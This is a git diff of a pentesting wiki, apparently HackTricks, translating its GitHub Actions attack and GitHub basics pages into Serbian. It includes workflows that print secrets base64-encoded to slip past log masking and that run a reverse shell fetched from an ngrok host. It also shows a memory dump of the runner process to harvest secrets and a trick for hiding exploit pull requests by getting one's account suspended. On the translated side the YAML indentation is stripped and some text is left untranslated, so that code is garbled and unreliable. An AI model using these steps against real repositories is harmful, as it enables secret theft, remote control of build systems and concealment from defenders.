+Ako su drugi repozitorijumi koristili **zavisnosti iz ovih korisničkih repozitorijuma**, napadač će moći da ih otme. Ovde imate potpunije objašnjenje: [https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/)
 
 ---
 
 ## Repo Pivoting
 
 > [!NOTE]
-> In this section we will talk about techniques that would allow to **pivot from one repo to another** supposing we have some kind of access on the first one (check the previous section).
+> U ovom odeljku ćemo govoriti o tehnikama koje bi omogućile **pivotiranje sa jednog repozitorijuma na drugi**, pod pretpostavkom da imamo neku vrstu pristupa prvom (proverite prethodni odeljak).
 
-### Cache Poisoning
+### Trovanje Kešom
 
-A cache is maintained between **wokflow runs in the same branch**. Which means that if an attacker **compromise** a **package** that is then stored in the cache and **downloaded** and executed by a **more privileged** workflow he will be able to **compromise** also that workflow.
+Keš se održava između **izvršavanja radnih tokova u istoj grani**. Što znači da ako napadač **kompromituje** **paket** koji se zatim čuva u kešu i **preuzima** i izvršava ga **privilegovaniji** radni tok, on će moći da **kompromituje** i taj radni tok.
 
 {{#ref}}
 gh-actions-cache-poisoning.md
 {{#endref}}
 
-### Artifact Poisoning
+### Trovanje Artefaktima
 
-Workflows could use **artifacts from other workflows and even repos**, if an attacker manages to **compromise** the Github Action that **uploads an artifact** that is later used by another workflow he could **compromise the other workflows**:
+Radni tokovi mogu koristiti **artefakte iz drugih radnih tokova i čak repozitorijuma**, ako napadač uspe da **kompromituje** Github Akciju koja **otprema artefakt** koji se kasnije koristi od strane drugog radnog toka, on bi mogao da **kompromituje druge radne tokove**:
 
 {{#ref}}
 gh-actions-artifact-poisoning.md
@@ -394,11 +376,11 @@ gh-actions-artifact-poisoning.md
 
 ---
 
-## Post Exploitation from an Action
+## Post Eksploatacija iz Akcije
 
-### Accessing AWS and GCP via OIDC
+### Pristupanje AWS i GCP putem OIDC
 
-Check the following pages:
+Proverite sledeće stranice:
 
 {{#ref}}
 ../../../pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
@@ -408,170 +390,160 @@ Check the following pages:
 ../../../pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md
 {{#endref}}
 
-### Accessing secrets 
+### Pristupanje tajnama 
 
-If you are injecting content into a script it's interesting to know how you can access secrets:
+Ako ubacujete sadržaj u skriptu, zanimljivo je znati kako možete pristupiti tajnama:
 
-- If the secret or token is set to an **environment variable**, it can be directly accessed through the environment using **`printenv`**.
+- Ako je tajna ili token postavljen na **promenljivu okruženja**, može se direktno pristupiti kroz okruženje koristeći **`printenv`**.
 
 

 
-List secrets in Github Action output
-
+Lista tajni u izlazu Github Akcije
 ```yaml
 name: list_env
 on:
-  workflow_dispatch: # Launch manually
-  pull_request: #Run it when a PR is created to a branch
-    branches:
-      - '**'
-  push: # Run it when a push is made to a branch
-    branches:
-      - '**'
+workflow_dispatch: # Launch manually
+pull_request: #Run it when a PR is created to a branch
+branches:
+- '**'
+push: # Run it when a push is made to a branch
+branches:
+- '**'
 jobs:
-  List_env:
-    runs-on: ubuntu-latest
-    steps:
-      - name: List Env
-        # Need to base64 encode or github will change the secret value for "***"
-        run: sh -c 'env | grep "secret_" | base64 -w0'
-        env:
-          secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
+List_env:
+runs-on: ubuntu-latest
+steps:
+- name: List Env
+# Need to base64 encode or github will change the secret value for "***"
+run: sh -c 'env | grep "secret_" | base64 -w0'
+env:
+secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
 
-                    secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
+secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
 ```
-
 

 
 

 
-Get reverse shell with secrets
-
+Dobijanje reverzne ljuske sa tajnama
 ```yaml
 name: revshell
 on:
-  workflow_dispatch: # Launch manually
-  pull_request: #Run it when a PR is created to a branch
-    branches:
-      - "**"
-  push: # Run it when a push is made to a branch
-    branches:
-      - "**"
+workflow_dispatch: # Launch manually
+pull_request: #Run it when a PR is created to a branch
+branches:
+- "**"
+push: # Run it when a push is made to a branch
+branches:
+- "**"
 jobs:
-  create_pull_request:
-    runs-on: ubuntu-latest
-    steps:
-      - name: Get Rev Shell
-        run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
-        env:
-          secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
-          secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
+create_pull_request:
+runs-on: ubuntu-latest
+steps:
+- name: Get Rev Shell
+run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
+env:
+secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
+secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
 ```
-
 

 
-- If the secret is used **directly in an expression**, the generated shell script is stored **on-disk** and is accessible.
-  - ```bash
-    cat /home/runner/work/_temp/*
-    ```
-- For a JavaScript actions the secrets and sent through environment variables
-  - ```bash
-    ps axe | grep node
-    ```
-- For a **custom action**, the risk can vary depending on how a program is using the secret it obtained from the **argument**:
+- Ako se tajna koristi **direktno u izrazu**, generisani shell skript se čuva **na disku** i može se pristupiti.
+- ```bash
+cat /home/runner/work/_temp/*
+```
+- Za JavaScript akcije, tajne se šalju kroz promenljive okruženja.
+- ```bash
+ps axe | grep node
+```
+- Za **prilagođenu akciju**, rizik može varirati u zavisnosti od toga kako program koristi tajnu koju je dobio iz **argumenta**:
 
-  ```yaml
-  uses: fakeaction/publish@v3
-  with:
-    key: ${{ secrets.PUBLISH_KEY }}
-  ```
+```yaml
+uses: fakeaction/publish@v3
+with:
+key: ${{ secrets.PUBLISH_KEY }}
+```
 
-### Abusing Self-hosted runners
+### Zloupotreba samostalno hostovanih izvršilaca
 
-The way to find which **Github Actions are being executed in non-github infrastructure** is to search for **`runs-on: self-hosted`** in the Github Action configuration yaml.
+Način da se pronađe koje **Github Actions se izvršavaju u ne-github infrastrukturi** je pretraga za **`runs-on: self-hosted`** u konfiguraciji yaml za Github Action.
 
-**Self-hosted** runners might have access to **extra sensitive information**, to other **network systems** (vulnerable endpoints in the network? metadata service?) or, even if it's isolated and destroyed, **more than one action might be run at the same time** and the malicious one could **steal the secrets** of the other one.
-
-In self-hosted runners it's also possible to obtain the **secrets from the \_Runner.Listener**\_\*\* process\*\* which will contain all the secrets of the workflows at any step by dumping its memory:
+**Samostalno hostovani** izvršioci mogu imati pristup **dodatnim osetljivim informacijama**, drugim **mrežnim sistemima** (ranjivi krajnji tački u mreži? servis za metapodatke?) ili, čak i ako je izolovan i uništen, **više od jedne akcije može biti pokrenuto u isto vreme** i zlonamerna može **ukrasti tajne** druge.
 
+U samostalno hostovanim izvršiocima takođe je moguće dobiti **tajne iz \_Runner.Listener**\_\*\* procesa\*\* koji će sadržati sve tajne radnih tokova u bilo kojoj fazi dumpovanjem njegove memorije:
 ```bash
 sudo apt-get install -y gdb
 sudo gcore -o k.dump "$(ps ax | grep 'Runner.Listener' | head -n 1 | awk '{ print $1 }')"
 ```
-
-Check [**this post for more information**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/).
+Proverite [**ovaj post za više informacija**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/).
 
 ### Github Docker Images Registry
 
-It's possible to make Github actions that will **build and store a Docker image inside Github**.\
-An example can be find in the following expandable:
+Moguće je napraviti Github akcije koje će **izgraditi i sačuvati Docker sliku unutar Github-a**.\
+Primer se može naći u sledećem proširivom:
 
 

 
 Github Action Build & Push Docker Image
-
 ```yaml
 [...]
 
 - name: Set up Docker Buildx
-  uses: docker/setup-buildx-action@v1
+uses: docker/setup-buildx-action@v1
 
 - name: Login to GitHub Container Registry
-  uses: docker/login-action@v1
-  with:
-    registry: ghcr.io
-    username: ${{ github.repository_owner }}
-    password: ${{ secrets.ACTIONS_TOKEN }}
+uses: docker/login-action@v1
+with:
+registry: ghcr.io
+username: ${{ github.repository_owner }}
+password: ${{ secrets.ACTIONS_TOKEN }}
 
 - name: Add Github Token to Dockerfile to be able to download code
-  run: |
-    sed -i -e 's/TOKEN=##VALUE##/TOKEN=${{ secrets.ACTIONS_TOKEN }}/g' Dockerfile
+run: |
+sed -i -e 's/TOKEN=##VALUE##/TOKEN=${{ secrets.ACTIONS_TOKEN }}/g' Dockerfile
 
 - name: Build and push
-  uses: docker/build-push-action@v2
-    with:
-      context: .
-      push: true
-      tags: |
-        ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:latest
-        ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:${{ env.GITHUB_NEWXREF }}-${{ github.sha }}
+uses: docker/build-push-action@v2
+with:
+context: .
+push: true
+tags: |
+ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:latest
+ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:${{ env.GITHUB_NEWXREF }}-${{ github.sha }}
 
 [...]
 ```
-
 

 
-As you could see in the previous code, the Github registry is hosted in **`ghcr.io`**.
-
-A user with read permissions over the repo will then be able to download the Docker Image using a personal access token:
+Kao što ste mogli videti u prethodnom kodu, Github registry je hostovan na **`ghcr.io`**.
 
+Korisnik sa pravima čitanja nad repozitorijumom će moći da preuzme Docker sliku koristeći lični pristupni token:
 ```bash
 echo $gh_token | docker login ghcr.io -u  --password-stdin
 docker pull ghcr.io//:
 ```
-
 Then, the user could search for **leaked secrets in the Docker image layers:**
 
 {{#ref}}
 https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics
 {{#endref}}
 
-### Sensitive info in Github Actions logs
+### Osetljive informacije u Github Actions logovima
 
-Even if **Github** try to **detect secret values** in the actions logs and **avoid showing** them, **other sensitive data** that could have been generated in the execution of the action won't be hidden. For example a JWT signed with a secret value won't be hidden unless it's [specifically configured](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret).
+Čak i ako **Github** pokušava da **otkrije tajne vrednosti** u logovima akcija i **izbegne da ih prikaže**, **dati osetljivi podaci** koji su mogli biti generisani tokom izvršenja akcije neće biti sakriveni. Na primer, JWT potpisan tajnom vrednošću neće biti sakriven osim ako nije [specifično konfigurisano](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret).
 
-## Covering your Tracks
+## Sakrivanje tragova
 
-(Technique from [**here**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit)) First of all, any PR raised is clearly visible to the public in Github and to the target GitHub account. In GitHub by default, we **can’t delete a PR of the internet**, but there is a twist. For Github accounts that are **suspended** by Github, all of their **PRs are automatically deleted** and removed from the internet. So in order to hide your activity you need to either get your **GitHub account suspended or get your account flagged**. This would **hide all your activities** on GitHub from the internet (basically remove all your exploit PR)
+(Teknika iz [**ovde**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit)) Prvo, svaki PR koji je podnet je jasno vidljiv javnosti na Github-u i ciljanom GitHub nalogu. Na GitHub-u po defaultu, **ne možemo obrisati PR sa interneta**, ali postoji obrt. Za GitHub naloge koji su **suspendovani** od strane GitHub-a, svi njihovi **PR-ovi se automatski brišu** i uklanjaju sa interneta. Dakle, da biste sakrili svoju aktivnost, potrebno je da ili dobijete **suspendovan GitHub nalog ili da vam nalog bude označen**. Ovo bi **sakrilo sve vaše aktivnosti** na GitHub-u sa interneta (u suštini uklonilo sve vaše exploit PR-ove)
 
-An organization in GitHub is very proactive in reporting accounts to GitHub. All you need to do is share “some stuff” in Issue and they will make sure your account is suspended in 12 hours :p and there you have, made your exploit invisible on github.
+Organizacija na GitHub-u je veoma proaktivna u izveštavanju naloga GitHub-u. Sve što treba da uradite je da podelite "neke stvari" u Issue i oni će se pobrinuti da vaš nalog bude suspendovan za 12 sati :p i eto, učinili ste svoj exploit nevidljivim na github-u.
 
 > [!WARNING]
-> The only way for an organization to figure out they have been targeted is to check GitHub logs from SIEM since from GitHub UI the PR would be removed.
+> Jedini način na koji organizacija može da sazna da su bili meta je da proveri GitHub logove iz SIEM-a, jer bi iz GitHub UI PR bio uklonjen.
 
-## Tools
+## Alati
 
-The following tools are useful to find Github Action workflows and even find vulnerable ones:
+Sledeći alati su korisni za pronalaženje Github Action radnih tokova i čak pronalaženje ranjivih:
 
 - [https://github.com/CycodeLabs/raven](https://github.com/CycodeLabs/raven)
 - [https://github.com/praetorian-inc/gato](https://github.com/praetorian-inc/gato)
@@ -579,7 +551,3 @@ The following tools are useful to find Github Action workflows and even find vul
 - [https://github.com/carlospolop/PurplePanda](https://github.com/carlospolop/PurplePanda)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
index ae156de2d..9c1de6e75 100644
--- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
+++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
@@ -1,6 +1 @@
-# Gh Actions - Artifact Poisoning
-
-
-
-
-
+# Gh Actions - Zagađenje Artefakata
diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
index 024aa5ff8..f77c0d2d3 100644
--- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
+++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
@@ -1,6 +1 @@
 # GH Actions - Cache Poisoning
-
-
-
-
-
diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
index 3cd632bd0..997bd584f 100644
--- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
+++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
@@ -1,6 +1 @@
-# Gh Actions - Context Script Injections
-
-
-
-
-
+# Gh Actions - Kontekstualne Injekcije Skripti
diff --git a/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md b/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
index f19fa699e..5d49c6a11 100644
--- a/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
+++ b/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
@@ -2,59 +2,42 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-This ways to access data from Github that was supposedly deleted was [**reported in this blog post**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github).
+Ovi načini za pristup podacima sa GitHub-a koji su navodno obrisani su [**prijavljeni u ovom blog postu**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github).
 
 ## Accessing Deleted Fork Data
 
-1. You fork a public repository
-2. You commit code to your fork
-3. You delete your fork
+1. Forkujete javni repozitorijum
+2. Komitujete kod u vaš fork
+3. Brišete vaš fork
 
 > [!CAUTION]
-> The data commited in the deleted fork is still accessible.
+> Podaci komitovani u obrisanom forku su i dalje dostupni.
 
 ## Accessing Deleted Repo Data
 
-1. You have a public repo on GitHub.
-2. A user forks your repo.
-3. You commit data after they fork it (and they never sync their fork with your updates).
-4. You delete the entire repo.
+1. Imate javni repozitorijum na GitHub-u.
+2. Korisnik fork-uje vaš repozitorijum.
+3. Komitujete podatke nakon što su fork-ovali (i nikada ne sinhronizuju svoj fork sa vašim ažuriranjima).
+4. Brišete ceo repozitorijum.
 
 > [!CAUTION]
-> Even if you deleted your repo, all the changes made to it are still accessible through the forks.
+> Čak i ako ste obrisali vaš repozitorijum, sve promene napravljene na njemu su i dalje dostupne kroz forke.
 
 ## Accessing Private Repo Data
 
-1. You create a private repo that will eventually be made public.
-2. You create a private, internal version of that repo (via forking) and commit additional code for features that you’re not going to make public.
-3. You make your “upstream” repository public and keep your fork private.
+1. Kreirate privatni repozitorijum koji će na kraju postati javan.
+2. Kreirate privatnu, internu verziju tog repozitorijuma (putem forkovanja) i komitujete dodatni kod za funkcije koje nećete učiniti javnim.
+3. Činite vaš “upstream” repozitorijum javnim i zadržavate vaš fork privatnim.
 
 > [!CAUTION]
-> It's possible to access al the data pushed to the internal fork in the time between the internal fork was created and the public version was made public.
+> Moguće je pristupiti svim podacima koji su poslati u internu fork u vremenu između kada je interna fork kreirana i kada je javna verzija postala javna.
 
 ## How to discover commits from deleted/hidden forks
 
-The same blog post propose 2 options:
+Isti blog post predlaže 2 opcije:
 
 ### Directly accessing the commit
 
-If the commit ID (sha-1) value is known it's possible to access it in `https://github.com///commit/`
+Ako je poznata vrednost ID-a komita (sha-1), moguće je pristupiti mu na `https://github.com///commit/`
 
 ### Brute-forcing short SHA-1 values
-
-It's the same to access both of these:
-
-- [https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14](https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14)
-- [https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463](https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463)
-
-And the latest one use a short sha-1 that is bruteforceable.
-
-## References
-
-- [https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github)
-
-{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/github-security/basic-github-information.md b/src/pentesting-ci-cd/github-security/basic-github-information.md
index ae1365a0f..2c05fb66e 100644
--- a/src/pentesting-ci-cd/github-security/basic-github-information.md
+++ b/src/pentesting-ci-cd/github-security/basic-github-information.md
@@ -1,248 +1,242 @@
-# Basic Github Information
+# Osnovne informacije o Github-u
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Structure
+## Osnovna struktura
 
-The basic github environment structure of a big **company** is to own an **enterprise** which owns **several organizations** and each of them may contain **several repositories** and **several teams.**. Smaller companies may just **own one organization and no enterprises**.
+Osnovna struktura github okruženja velike **kompanije** je da poseduje **preduzeće** koje poseduje **several organizacija** i svaka od njih može sadržati **several repozitorijuma** i **several timova**. Manje kompanije mogu samo **posedovati jednu organizaciju i bez preduzeća**.
 
-From a user point of view a **user** can be a **member** of **different enterprises and organizations**. Within them the user may have **different enterprise, organization and repository roles**.
+Sa tačke gledišta korisnika, **korisnik** može biti **član** **različitih preduzeća i organizacija**. Unutar njih korisnik može imati **različite uloge u preduzeću, organizaciji i repozitorijumu**.
 
-Moreover, a user may be **part of different teams** with different enterprise, organization or repository roles.
+Štaviše, korisnik može biti **deo različitih timova** sa različitim ulogama u preduzeću, organizaciji ili repozitorijumu.
 
-And finally **repositories may have special protection mechanisms**.
+I konačno, **repozitorijumi mogu imati posebne mehanizme zaštite**.
 
-## Privileges
+## Privilegije
 
-### Enterprise Roles
+### Uloge u preduzeću
 
-- **Enterprise owner**: People with this role can **manage administrators, manage organizations within the enterprise, manage enterprise settings, enforce policy across organizations**. However, they **cannot access organization settings or content** unless they are made an organization owner or given direct access to an organization-owned repository
-- **Enterprise members**: Members of organizations owned by your enterprise are also **automatically members of the enterprise**.
+- **Vlasnik preduzeća**: Osobe sa ovom ulogom mogu **upravljati administratorima, upravljati organizacijama unutar preduzeća, upravljati postavkama preduzeća, sprovoditi politiku širom organizacija**. Međutim, oni **ne mogu pristupiti postavkama organizacije ili sadržaju** osim ako nisu postavljeni za vlasnika organizacije ili im nije dat direktan pristup repozitorijumu koji poseduje organizacija.
+- **Članovi preduzeća**: Članovi organizacija koje poseduje vaše preduzeće su takođe **automatski članovi preduzeća**.
 
-### Organization Roles
+### Uloge u organizaciji
 
-In an organisation users can have different roles:
+U organizaciji korisnici mogu imati različite uloge:
 
-- **Organization owners**: Organization owners have **complete administrative access to your organization**. This role should be limited, but to no less than two people, in your organization.
-- **Organization members**: The **default**, non-administrative role for **people in an organization** is the organization member. By default, organization members **have a number of permissions**.
-- **Billing managers**: Billing managers are users who can **manage the billing settings for your organization**, such as payment information.
-- **Security Managers**: It's a role that organization owners can assign to any team in an organization. When applied, it gives every member of the team permissions to **manage security alerts and settings across your organization, as well as read permissions for all repositories** in the organization.
-  - If your organization has a security team, you can use the security manager role to give members of the team the least access they need to the organization.
-- **Github App managers**: To allow additional users to **manage GitHub Apps owned by an organization**, an owner can grant them GitHub App manager permissions.
-- **Outside collaborators**: An outside collaborator is a person who has **access to one or more organization repositories but is not explicitly a member** of the organization.
+- **Vlasnici organizacije**: Vlasnici organizacije imaju **potpun pristup administraciji vaše organizacije**. Ova uloga bi trebala biti ograničena, ali ne na manje od dve osobe, u vašoj organizaciji.
+- **Članovi organizacije**: **Podrazumevana**, neadministrativna uloga za **ljude u organizaciji** je član organizacije. Po defaultu, članovi organizacije **imaju određeni broj dozvola**.
+- **Menadžeri naplate**: Menadžeri naplate su korisnici koji mogu **upravljati postavkama naplate za vašu organizaciju**, kao što su informacije o plaćanju.
+- **Menadžeri bezbednosti**: To je uloga koju vlasnici organizacije mogu dodeliti bilo kojem timu u organizaciji. Kada se primeni, daje svakom članu tima dozvole da **upravljaju bezbednosnim upozorenjima i postavkama širom vaše organizacije, kao i dozvole za čitanje za sve repozitorijume** u organizaciji.
+- Ako vaša organizacija ima tim za bezbednost, možete koristiti ulogu menadžera bezbednosti da članovima tima date minimalan pristup koji im je potreban za organizaciju.
+- **Menadžeri Github aplikacija**: Da bi omogućili dodatnim korisnicima da **upravljaju GitHub aplikacijama koje poseduje organizacija**, vlasnik može dodeliti dozvole menadžera GitHub aplikacija.
+- **Spoljni saradnici**: Spoljni saradnik je osoba koja ima **pristup jednom ili više repozitorijuma organizacije, ali nije eksplicitno član** organizacije.
 
-You can **compare the permissions** of these roles in this table: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles)
+Možete **uporediti dozvole** ovih uloga u ovoj tabeli: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles)
 
-### Members Privileges
+### Privilegije članova
 
-In _https://github.com/organizations/\/settings/member_privileges_ you can see the **permissions users will have just for being part of the organisation**.
+Na _https://github.com/organizations/\/settings/member_privileges_ možete videti **dozvole koje korisnici imaju samo zato što su deo organizacije**.
 
-The settings here configured will indicate the following permissions of members of the organisation:
+Postavke ovde konfigurisane će ukazivati na sledeće dozvole članova organizacije:
 
-- Be admin, writer, reader or no permission over all the organisation repos.
-- If members can create private, internal or public repositories.
-- If forking of repositories is possible
-- If it's possible to invite outside collaborators
-- If public or private sites can be published
-- The permissions admins has over the repositories
-- If members can create new teams
+- Biti administrator, pisac, čitalac ili bez dozvole nad svim repozitorijumima organizacije.
+- Da li članovi mogu kreirati privatne, interne ili javne repozitorijume.
+- Da li je moguće fork-ovati repozitorijume.
+- Da li je moguće pozvati spoljne saradnike.
+- Da li se mogu objavljivati javne ili privatne stranice.
+- Dozvole koje administratori imaju nad repozitorijumima.
+- Da li članovi mogu kreirati nove timove.
 
-### Repository Roles
+### Uloge u repozitorijumu
 
-By default repository roles are created:
+Po defaultu, uloge u repozitorijumu su kreirane:
 
-- **Read**: Recommended for **non-code contributors** who want to view or discuss your project
-- **Triage**: Recommended for **contributors who need to proactively manage issues and pull requests** without write access
-- **Write**: Recommended for contributors who **actively push to your project**
-- **Maintain**: Recommended for **project managers who need to manage the repository** without access to sensitive or destructive actions
-- **Admin**: Recommended for people who need **full access to the project**, including sensitive and destructive actions like managing security or deleting a repository
+- **Čitanje**: Preporučuje se za **ne-kodere** koji žele da pregledaju ili diskutuju o vašem projektu.
+- **Triage**: Preporučuje se za **kontributore koji treba proaktivno da upravljaju problemima i pull zahtevima** bez pristupa pisanju.
+- **Pisanje**: Preporučuje se za kontributore koji **aktivno doprinose vašem projektu**.
+- **Održavanje**: Preporučuje se za **menadžere projekata koji treba da upravljaju repozitorijumom** bez pristupa osetljivim ili destruktivnim radnjama.
+- **Administrator**: Preporučuje se za ljude koji trebaju **potpun pristup projektu**, uključujući osetljive i destruktivne radnje kao što su upravljanje bezbednošću ili brisanje repozitorijuma.
 
-You can **compare the permissions** of each role in this table [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role)
+Možete **uporediti dozvole** svake uloge u ovoj tabeli [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role)
 
-You can also **create your own roles** in _https://github.com/organizations/\/settings/roles_
+Takođe možete **kreirati svoje uloge** na _https://github.com/organizations/\/settings/roles_
 
-### Teams
+### Timovi
 
-You can **list the teams created in an organization** in _https://github.com/orgs/\/teams_. Note that to see the teams which are children of other teams you need to access each parent team.
+Možete **navesti timove kreirane u organizaciji** na _https://github.com/orgs/\/teams_. Imajte na umu da da biste videli timove koji su deca drugih timova, morate pristupiti svakom roditeljskom timu.
 
-### Users
+### Korisnici
 
-The users of an organization can be **listed** in _https://github.com/orgs/\/people._
+Korisnici organizacije mogu biti **navedeni** na _https://github.com/orgs/\/people._
 
-In the information of each user you can see the **teams the user is member of**, and the **repos the user has access to**.
+U informacijama o svakom korisniku možete videti **timove čiji je korisnik član**, i **repozitorijume kojima korisnik ima pristup**.
 
-## Github Authentication
+## Github autentifikacija
 
-Github offers different ways to authenticate to your account and perform actions on your behalf.
+Github nudi različite načine za autentifikaciju na vašem nalogu i obavljanje radnji u vaše ime.
 
-### Web Access
+### Web pristup
 
-Accessing **github.com** you can login using your **username and password** (and a **2FA potentially**).
+Pristupajući **github.com**, možete se prijaviti koristeći svoje **korisničko ime i lozinku** (i **2FA potencijalno**).
 
-### **SSH Keys**
+### **SSH ključevi**
 
-You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [https://github.com/settings/keys](https://github.com/settings/keys)
+Možete konfigurisati svoj nalog sa jednim ili više javnih ključeva koji omogućavaju povezani **privatni ključ da obavlja radnje u vaše ime.** [https://github.com/settings/keys](https://github.com/settings/keys)
 
-#### **GPG Keys**
+#### **GPG ključevi**
 
-You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. Learn more about [vigilant mode here](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode).
+Ne **možete se pretvarati da ste korisnik sa ovim ključevima**, ali ako ih ne koristite, može biti moguće da **budete otkriveni zbog slanja commit-a bez potpisa**. Saznajte više o [vigilant mode ovde](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode).
 
-### **Personal Access Tokens**
+### **Lični pristupni tokeni**
 
-You can generate personal access token to **give an application access to your account**. When creating a personal access token the **user** needs to **specify** the **permissions** to **token** will have. [https://github.com/settings/tokens](https://github.com/settings/tokens)
+Možete generisati lični pristupni token da **dajte aplikaciji pristup vašem nalogu**. Kada kreirate lični pristupni token, **korisnik** treba da **navede** **dozvole** koje **token** će imati. [https://github.com/settings/tokens](https://github.com/settings/tokens)
 
-### Oauth Applications
+### Oauth aplikacije
 
-Oauth applications may ask you for permissions **to access part of your github information or to impersonate you** to perform some actions. A common example of this functionality is the **login with github button** you might find in some platforms.
+Oauth aplikacije mogu vas pitati za dozvole **da pristupe delu vaših github informacija ili da se pretvaraju da ste vi** da bi obavili neke radnje. Uobičajen primer ove funkcionalnosti je **dugme za prijavu sa github-om** koje možete pronaći na nekim platformama.
 
-- You can **create** your own **Oauth applications** in [https://github.com/settings/developers](https://github.com/settings/developers)
-- You can see all the **Oauth applications that has access to your account** in [https://github.com/settings/applications](https://github.com/settings/applications)
-- You can see the **scopes that Oauth Apps can ask for** in [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps)
-- You can see third party access of applications in an **organization** in _https://github.com/organizations/\/settings/oauth_application_policy_
+- Možete **kreirati** svoje **Oauth aplikacije** na [https://github.com/settings/developers](https://github.com/settings/developers)
+- Možete videti sve **Oauth aplikacije koje imaju pristup vašem nalogu** na [https://github.com/settings/applications](https://github.com/settings/applications)
+- Možete videti **opsege koje Oauth aplikacije mogu tražiti** na [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps)
+- Možete videti pristup trećih strana aplikacija u **organizaciji** na _https://github.com/organizations/\/settings/oauth_application_policy_
 
-Some **security recommendations**:
+Neke **preporuke za bezbednost**:
 
-- An **OAuth App** should always **act as the authenticated GitHub user across all of GitHub** (for example, when providing user notifications) and with access only to the specified scopes..
-- An OAuth App can be used as an identity provider by enabling a "Login with GitHub" for the authenticated user.
-- **Don't** build an **OAuth App** if you want your application to act on a **single repository**. With the `repo` OAuth scope, OAuth Apps can **act on \_all**\_\*\* of the authenticated user's repositorie\*\*s.
